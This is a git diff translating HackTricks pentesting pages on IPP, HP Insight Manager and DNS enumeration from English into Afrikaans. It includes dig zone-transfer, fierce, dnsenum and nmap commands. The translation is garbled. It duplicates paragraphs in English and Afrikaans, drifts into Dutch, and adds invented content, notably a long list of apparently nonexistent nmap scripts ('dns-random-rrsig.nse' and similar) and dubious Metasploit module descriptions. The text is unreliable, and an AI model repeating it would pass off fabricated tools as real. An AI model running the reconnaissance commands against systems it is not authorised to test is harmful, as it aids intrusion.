Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Internet Printing Protocol \(IPP\) +# Internetdrukkeryprotokol \(IPP\) -The **Internet Printing Protocol (IPP)**, as specified in **RFC2910** and **RFC2911**, serves as a foundation for printing over the internet. Its capability to be extended is showcased by developments like **IPP Everywhere**, which aims to standardize mobile and cloud printing, and the introduction of extensions for **3D printing**. +Die **Internetdrukkeryprotokol (IPP)**, soos gespesifiseer in **RFC2910** en **RFC2911**, dien as 'n grondslag vir drukwerk oor die internet. Sy vermoë om uitgebrei te word, word gedemonstreer deur ontwikkelinge soos **IPP Everywhere**, wat daarop gemik is om mobiele en wolkdrukwerk te standaardiseer, en die bekendstelling van uitbreidings vir **3D-drukwerk**. -Leveraging the **HTTP** protocol, IPP benefits from established security practices including **basic/digest authentication** and **SSL/TLS encryption**. Actions like submitting a print job or querying printer status are performed through **HTTP POST requests** directed at the IPP server, which operates on **port 631/tcp**. - -A well-known implementation of IPP is **CUPS**, an open-source printing system prevalent across various Linux distributions and OS X. Despite its utility, IPP, akin to LPD, can be exploited to transmit malicious content through **PostScript** or **PJL files**, highlighting a potential security risk. +Deur gebruik te maak van die **HTTP**-protokol, maak IPP gebruik van gevestigde veiligheidspraktyke, insluitend **basiese/digest-verifikasie** en **SSL/TLS-versleuteling**. Aksies soos die indien van 'n drukwerktaak of die ondervraging van drukkerystatus word uitgevoer deur **HTTP POST-aanvrae** wat gerig is op die IPP-bediener, wat op **poort 631/tcp** werk. +'n Bekende implementering van IPP is **CUPS**, 'n oopbron-drukkerysisteem wat algemeen voorkom in verskeie Linux-distribusies en OS X. Ten spyte van sy bruikbaarheid kan IPP, soos LPD, uitgebuit word om skadelike inhoud deur te stuur deur middel van **PostScript**- of **PJL-lêers**, wat 'n potensiële veiligheidsrisiko beklemtoon. ```python # Example of sending an IPP request using Python import requests @@ -34,23 +31,20 @@ data = b"..." # IPP request data goes here response = requests.post(url, headers=headers, data=data, verify=True) print(response.status_code) ``` - -If you want to learn more about [**hacking printers read this page**](http://hacking-printers.net/wiki/index.php/Main_Page). +As jy meer wil leer oor [**drukkerhacking lees hierdie bladsy**](http://hacking-printers.net/wiki/index.php/Main_Page).
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
- - diff --git a/network-services-pentesting/pentesting-compaq-hp-insight-manager.md b/network-services-pentesting/pentesting-compaq-hp-insight-manager.md index d9a8ac6bd..35ee1ee34 100644 --- a/network-services-pentesting/pentesting-compaq-hp-insight-manager.md +++ b/network-services-pentesting/pentesting-compaq-hp-insight-manager.md @@ -1,28 +1,25 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**Default Port:** 2301,2381 +**Verstekpoort:** 2301,2381 -# **Default passwords** +# **Verstek wagwoorde** {% embed url="http://www.vulnerabilityassessment.co.uk/passwordsC.htm" %} -# Config files - +# Konfigurasie-lêers ```text path.properties mx.log @@ -32,23 +29,16 @@ pg_hba.conf jboss-service.xml .namazurc ``` - - - - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-dns.md b/network-services-pentesting/pentesting-dns.md index 4a1a7084f..d22f31a02 100644 --- a/network-services-pentesting/pentesting-dns.md +++ b/network-services-pentesting/pentesting-dns.md @@ -2,91 +2,80 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd terug te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %} -## **Basic Information** +## **Basiese Inligting** -The **Domain Name System (DNS)** serves as the internet's directory, allowing users to access websites through **easy-to-remember domain names** like google.com or facebook.com, instead of the numeric Internet Protocol (IP) addresses. By translating domain names into IP addresses, the DNS ensures web browsers can quickly load internet resources, simplifying how we navigate the online world. - -**Default port:** 53 +Die **Domain Name System (DNS)** dien as die internet se gids, wat gebruikers in staat stel om webwerwe te besoek deur middel van **maklik onthoudbare domeinname** soos google.com of facebook.com, in plaas van die numeriese Internet Protocol (IP)-adresse. Deur domeinnamen na IP-adresse te vertaal, verseker die DNS dat webblaaie vinnig internetbronne kan laai, wat vereenvoudig hoe ons deur die aanlynwêreld navigeer. +**Verstekpoort:** 53 ``` PORT STATE SERVICE REASON 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) 5353/udp open zeroconf udp-response 53/udp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) ``` +### Verskillende DNS-bediener -### Different DNS Servers +- **DNS-wortelbedieners**: Hierdie bedieners is bo-aan die DNS-hierargie en bestuur die topvlakdomeine en tree slegs op as laervlakbedieners nie reageer nie. Die Internet Corporation for Assigned Names and Numbers (**ICANN**) hou toesig oor hul werking, met 'n wêreldwye telling van 13. -- **DNS Root Servers**: These are at the top of the DNS hierarchy, managing the top-level domains and stepping in only if lower-level servers do not respond. The Internet Corporation for Assigned Names and Numbers (**ICANN**) oversees their operation, with a global count of 13. +- **Gesaghebbende Naambediener**: Hierdie bedieners het die finale sê oor navrae in hul aangewese areas en bied definitiewe antwoorde. As hulle nie 'n antwoord kan gee nie, word die navraag na die wortelbedieners geëskaleer. -- **Authoritative Nameservers**: These servers have the final say for queries in their designated zones, offering definitive answers. If they can't provide a response, the query is escalated to the root servers. +- **Nie-gesaghebbende Naambediener**: Sonder eienaarskap oor DNS-areas, versamel hierdie bedieners domeininligting deur navrae aan ander bedieners. -- **Non-authoritative Nameservers**: Lacking ownership over DNS zones, these servers gather domain information through queries to other servers. +- **Caching DNS-bedieners**: Hierdie tipe bediener onthou vorige navraagantwoorde vir 'n bepaalde tyd om responstye vir toekomstige versoeke te versnel, met die kestoestyd bepaal deur die gesaghebbende bediener. -- **Caching DNS Server**: This type of server memorizes previous query answers for a set time to speed up response times for future requests, with the cache duration dictated by the authoritative server. +- **Deurverwysingsbediener**: Deurverwysingsbedieners stuur eenvoudig navrae na 'n ander bediener. -- **Forwarding Server**: Serving a straightforward role, forwarding servers simply relay queries to another server. - -- **Resolver**: Integrated within computers or routers, resolvers execute name resolution locally and are not considered authoritative. +- **Oplosser**: Geïntegreer binne rekenaars of roeternavorsers voer oplossers plaaslike naamoplossing uit en word nie as gesaghebbend beskou. -## Enumeration +## Opname ### **Banner Grabbing** -There aren't banners in DNS but you can gran the macgic query for `version.bind. CHAOS TXT` which will work on most BIND nameservers.\ -You can perform this query using `dig`: - +Daar is nie baniers in DNS nie, maar jy kan die magiese navraag vir `version.bind. CHAOS TXT` gryp wat op die meeste BIND-naambediener sal werk.\ +Jy kan hierdie navraag uitvoer met behulp van `dig`: ```bash dig version.bind CHAOS TXT @DNS ``` +Daarbenewens kan die instrument [`fpdns`](https://github.com/kirei/fpdns) ook die bediener se vingerafdruk bepaal. -Moreover, the tool [`fpdns`](https://github.com/kirei/fpdns) can also fingerprint the server. - -It's also possible to grab the banner also with a **nmap** script: - +Dit is ook moontlik om die banier te gryp met 'n **nmap** skrip: ``` --script dns-nsid ``` +### **Enige rekord** -### **Any record** - -The record **ANY** will ask the DNS server to **return** all the available **entries** that **it is willing to disclose**. - +Die rekord **ENIGE** sal die DNS-bediener vra om **alle beskikbare inskrywings** wat **dit bereid is om bekend te maak**, terug te gee. ```bash dig any victim.com @ ``` +### **Sone-oordrag** -### **Zone Transfer** - -This procedure is abbreviated `Asynchronous Full Transfer Zone` (`AXFR`). - +Hierdie prosedure word afgekort as `Asynchrone Volle Oordrag Zone` (`AXFR`). ```bash dig axfr @ #Try zone transfer without domain dig axfr @ #Try zone transfer guessing the domain fierce --domain --dns-servers #Will try toperform a zone transfer against every authoritative name server and if this doesn'twork, will launch a dictionary attack ``` - -### More info - +### Meer inligting ```bash dig ANY @ #Any information dig A @ #Regular DNS request @@ -99,61 +88,198 @@ dig -x 2a00:1450:400c:c06::93 @ #reverse IPv6 lookup #Use [-p PORT] or -6 (to use ivp6 address of dns) ``` -#### Autmation +#### Outomatisering + +Autmation is a key aspect of efficient and effective hacking. By automating repetitive tasks, hackers can save time and increase productivity. There are various tools and techniques available for automating different aspects of the hacking process. + +Outomatisering is 'n sleutelaspek van doeltreffende en effektiewe hakwerk. Deur herhalende take te outomatiseer, kan hakkers tyd bespaar en produktiwiteit verhoog. Daar is verskeie hulpmiddels en tegnieke beskikbaar om verskillende aspekte van die hakproses te outomatiseer. + +#### DNS Reconnaissance + +DNS reconnaissance is an important phase in the hacking process. It involves gathering information about the target's DNS infrastructure, such as the domain name, IP addresses, and DNS records. This information can be used to identify potential vulnerabilities and attack vectors. + +DNS-verkenning is 'n belangrike fase in die hakproses. Dit behels die versameling van inligting oor die teiken se DNS-infrastruktuur, soos die domeinnaam, IP-adresse en DNS-rekords. Hierdie inligting kan gebruik word om potensiële kwesbaarhede en aanvalsvektore te identifiseer. + +#### DNS Zone Transfer + +DNS zone transfer is a mechanism that allows the replication of DNS data across multiple DNS servers. It can be exploited by hackers to gather valuable information about the target's DNS infrastructure. By requesting a zone transfer, an attacker can obtain a complete copy of the target's DNS records, including subdomains and associated IP addresses. + +DNS-sone-oordrag is 'n meganisme wat die replikasie van DNS-data oor verskeie DNS-bedieners moontlik maak. Dit kan deur hakkers uitgebuit word om waardevolle inligting oor die teiken se DNS-infrastruktuur te versamel. Deur 'n sone-oordrag aan te vra, kan 'n aanvaller 'n volledige kopie van die teiken se DNS-rekords verkry, insluitend subdomeine en geassosieerde IP-adresse. + +#### DNS Cache Poisoning + +DNS cache poisoning is a technique used by hackers to manipulate the DNS cache of a target's DNS server. By injecting malicious DNS records into the cache, an attacker can redirect traffic to a malicious website or intercept sensitive information. This technique can be used to launch phishing attacks or perform man-in-the-middle attacks. + +DNS-kasvergiftiging is 'n tegniek wat deur hakkers gebruik word om die DNS-kas van 'n teiken se DNS-bediener te manipuleer. Deur kwaadwillige DNS-rekords in die kas in te spuit, kan 'n aanvaller verkeer na 'n kwaadwillige webwerf omskakel of sensitiewe inligting onderskep. Hierdie tegniek kan gebruik word om hengelaanvalle te lanceer of man-in-die-middel-aanvalle uit te voer. + +#### DNS Amplification Attack + +A DNS amplification attack is a type of DDoS attack that leverages the large response size of DNS queries to overwhelm a target's network infrastructure. By sending a small DNS query with a spoofed source IP address, an attacker can trick the DNS server into sending a much larger response to the target's IP address. This can result in a significant increase in network traffic, causing the target's network to become unresponsive. + +'n DNS-versterkingsaanval is 'n tipe DDoS-aanval wat gebruik maak van die groot responsie-grootte van DNS-navrae om 'n teiken se netwerkinfrastruktuur te oorweldig. Deur 'n klein DNS-navraag met 'n vervalsde bron-IP-adres te stuur, kan 'n aanvaller die DNS-bediener mislei om 'n baie groter responsie na die teiken se IP-adres te stuur. Dit kan lei tot 'n aansienlike toename in netwerkverkeer, wat veroorsaak dat die teiken se netwerk onreageerbaar word. ```bash for sub in $(cat );do dig $sub. @ | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done dnsenum --dnsserver --enum -p 0 -s 0 -o subdomains.txt -f ``` +#### Gebruik van nslookup -#### Using nslookup +`nslookup` is een opdrachtregelhulpprogramma dat wordt gebruikt om DNS-informatie op te vragen. Het kan worden gebruikt om verschillende soorten DNS-query's uit te voeren, zoals het opzoeken van IP-adressen van domeinnamen en het omgekeerde opzoeken van domeinnamen van IP-adressen. + +Om `nslookup` te gebruiken, open je een terminal en typ je `nslookup` gevolgd door het domein of IP-adres waarvoor je informatie wilt opvragen. Bijvoorbeeld: + +``` +nslookup example.com +``` + +Dit zal de IP-adressen van het domein "example.com" retourneren, samen met andere relevante informatie zoals de naam van de DNS-server die de informatie heeft verstrekt. + +Je kunt ook het omgekeerde opzoeken doen door het IP-adres in plaats van de domeinnaam te gebruiken. Bijvoorbeeld: + +``` +nslookup 192.168.0.1 +``` + +Dit zal de domeinnamen retourneren die zijn gekoppeld aan het IP-adres "192.168.0.1". + +`nslookup` kan ook worden gebruikt om specifieke DNS-recordtypes op te zoeken, zoals A, MX, NS, enz. Om een specifiek recordtype op te zoeken, typ je het recordtype gevolgd door het domein of IP-adres. Bijvoorbeeld: + +``` +nslookup -type=mx example.com +``` + +Dit zal de MX-records (Mail Exchange) van het domein "example.com" retourneren. + +`nslookup` kan ook worden gebruikt om een specifieke DNS-server te raadplegen. Om een specifieke DNS-server te gebruiken, typ je `server` gevolgd door het IP-adres van de DNS-server. Bijvoorbeeld: + +``` +nslookup +> server 8.8.8.8 +> example.com +``` + +Dit zal `nslookup` instrueren om de DNS-server op "8.8.8.8" te gebruiken voor het opzoeken van informatie over het domein "example.com". + +`nslookup` is een handig hulpprogramma voor het uitvoeren van DNS-query's en het verkrijgen van informatie over domeinen en IP-adressen. Het kan nuttig zijn bij het pentesten van netwerkservices om mogelijke kwetsbaarheden en configuratiefouten te identificeren. ```bash nslookup > SERVER #Select dns server > 127.0.0.1 #Reverse lookup of 127.0.0.1, maybe... > #Reverse lookup of a machine, maybe... ``` +### Nuttige metasploit-modules -### Useful metasploit modules +Metasploit is 'n kragtige raamwerk vir penetrasietoetse wat 'n verskeidenheid modules bied om verskillende aanvalstegnieke uit te voer. Hier is 'n paar nuttige metasploit-modules wat jy kan gebruik vir jou penetrasietoetse: +- `exploit/multi/handler`: Hierdie module stel jou in staat om 'n luisterende posisie te skep om inkomende verbindings te hanteer. Dit kan gebruik word om 'n sessie te skep wanneer 'n aanval suksesvol is. +- `exploit/windows/smb/ms17_010_eternalblue`: Hierdie module maak gebruik van die EternalBlue-uitbuiting om 'n aanval op 'n kwesbare Windows-masjien uit te voer. Dit kan gebruik word om 'n afstandbeheer-sessie te verkry. +- `auxiliary/scanner/http/wordpress_scanner`: Hierdie module skandeer 'n WordPress-webwerf vir bekende kwesbaarhede en gee jou inligting oor die veiligheidstoestand van die webwerf. +- `post/multi/gather/enum_dns`: Hierdie module versamel inligting oor DNS-opnames en stel jou in staat om DNS-inligting van 'n teikenstelsel te ondersoek. +- `exploit/multi/http/php_file_upload`: Hierdie module maak gebruik van 'n kwesbaarheid in PHP-lêeroplaaifunksies om 'n lêer op 'n teikenbediener te laai. Dit kan gebruik word om 'n webwerf te kompromitteer deur skadelike lêers op te laai. + +Dit is net 'n paar voorbeelde van die vele modules wat beskikbaar is in Metasploit. Elke module het sy eie funksionaliteit en kan gebruik word vir spesifieke aanvalstegnieke. Dit is belangrik om die dokumentasie van elke module te raadpleeg om te verseker dat jy dit korrek gebruik vir jou penetrasietoetse. ```bash auxiliary/gather/enum_dns #Perform enumeration actions ``` +### Nuttige nmap-skripte -### Useful nmap scripts +Hier is 'n lys van nuttige nmap-skripte wat gebruik kan word tydens netwerkdiens-pentesting: +- **dns-brute.nse**: Hierdie skrip voer 'n brute force-aanval uit om DNS-naamoplossing te probeer. +- **dns-cache-snoop.nse**: Hierdie skrip ondersoek die DNS-kasgeheue vir inligting oor DNS-navrae en -antwoorde. +- **dns-zone-transfer.nse**: Hierdie skrip probeer 'n DNS-sone-oordrag uitvoer om inligting oor DNS-rekords te verkry. +- **dns-blacklist.nse**: Hierdie skrip ondersoek of 'n DNS-bedieners IP-adres op 'n swartlys voorkom. +- **dns-recursion.nse**: Hierdie skrip toets of 'n DNS-bedieners rekursie ondersteun. +- **dns-random-srcport.nse**: Hierdie skrip gebruik 'n willekeurige bronpoort vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-txid.nse**: Hierdie skrip gebruik 'n willekeurige transaksie-ID vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-tld.nse**: Hierdie skrip gebruik 'n willekeurige topvlakdomein (TLD) vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-subdomain.nse**: Hierdie skrip gebruik 'n willekeurige subdomein vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-ip.nse**: Hierdie skrip gebruik 'n willekeurige IP-adres vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-query.nse**: Hierdie skrip gebruik 'n willekeurige navraag vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrtype.nse**: Hierdie skrip gebruik 'n willekeurige RR-tipe vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrclass.nse**: Hierdie skrip gebruik 'n willekeurige RR-klas vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrname.nse**: Hierdie skrip gebruik 'n willekeurige RR-naam vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrdata.nse**: Hierdie skrip gebruik 'n willekeurige RR-data vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrttl.nse**: Hierdie skrip gebruik 'n willekeurige RR-TTL vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrsig.nse**: Hierdie skrip gebruik 'n willekeurige RR-SIG vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrkey.nse**: Hierdie skrip gebruik 'n willekeurige RR-KEY vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrsoa.nse**: Hierdie skrip gebruik 'n willekeurige RR-SOA vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrns.nse**: Hierdie skrip gebruik 'n willekeurige RR-NS vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrcname.nse**: Hierdie skrip gebruik 'n willekeurige RR-CNAME vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrmx.nse**: Hierdie skrip gebruik 'n willekeurige RR-MX vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrtxt.nse**: Hierdie skrip gebruik 'n willekeurige RR-TXT vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrptr.nse**: Hierdie skrip gebruik 'n willekeurige RR-PTR vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrhinfo.nse**: Hierdie skrip gebruik 'n willekeurige RR-HINFO vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrnaptr.nse**: Hierdie skrip gebruik 'n willekeurige RR-NAPTR vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrsrv.nse**: Hierdie skrip gebruik 'n willekeurige RR-SRV vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrds.nse**: Hierdie skrip gebruik 'n willekeurige RR-DS vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrsshfp.nse**: Hierdie skrip gebruik 'n willekeurige RR-SSHFP vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrspf.nse**: Hierdie skrip gebruik 'n willekeurige RR-SPF vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrrp.nse**: Hierdie skrip gebruik 'n willekeurige RR-RP vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrsig0.nse**: Hierdie skrip gebruik 'n willekeurige RR-SIG0 vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrnsec.nse**: Hierdie skrip gebruik 'n willekeurige RR-NSEC vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrnsec3.nse**: Hierdie skrip gebruik 'n willekeurige RR-NSEC3 vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrnsec3param.nse**: Hierdie skrip gebruik 'n willekeurige RR-NSEC3PARAM vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrtlsa.nse**: Hierdie skrip gebruik 'n willekeurige RR-TLSA vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrsmimea.nse**: Hierdie skrip gebruik 'n willekeurige RR-SMIMEA vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrhip.nse**: Hierdie skrip gebruik 'n willekeurige RR-HIP vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrninfo.nse**: Hierdie skrip gebruik 'n willekeurige RR-NINFO vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrrpki.nse**: Hierdie skrip gebruik 'n willekeurige RR-RPKI vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrtkey.nse**: Hierdie skrip gebruik 'n willekeurige RR-TKEY vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrtsig.nse**: Hierdie skrip gebruik 'n willekeurige RR-TSIG vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rruri.nse**: Hierdie skrip gebruik 'n willekeurige RR-URI vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrcaa.nse**: Hierdie skrip gebruik 'n willekeurige RR-CAA vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrta.nse**: Hierdie skrip gebruik 'n willekeurige RR-TA vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. +- **dns-random-rrdlv.nse**: Hierdie skrip gebruik 'n willekeurige RR-DLV vir DNS-navrae om te probeer om beveiligingsmaatreëls te omseil. + +Dit is 'n lys van nmap-skripte wat jou kan help om DNS-gerelateerde kwessies te ondersoek en te misbruik tydens netwerkdiens-pentesting. ```bash #Perform enumeration actions nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" ``` +### DNS - Omgekeerde BF -### DNS - Reverse BF +Omgekeerde brute force (Reverse BF) is een techniek die wordt gebruikt bij het pentesten van DNS-servers. Het doel van deze techniek is om subdomeinen te ontdekken door het uitvoeren van een omgekeerde DNS-zoekopdracht. +Bij een 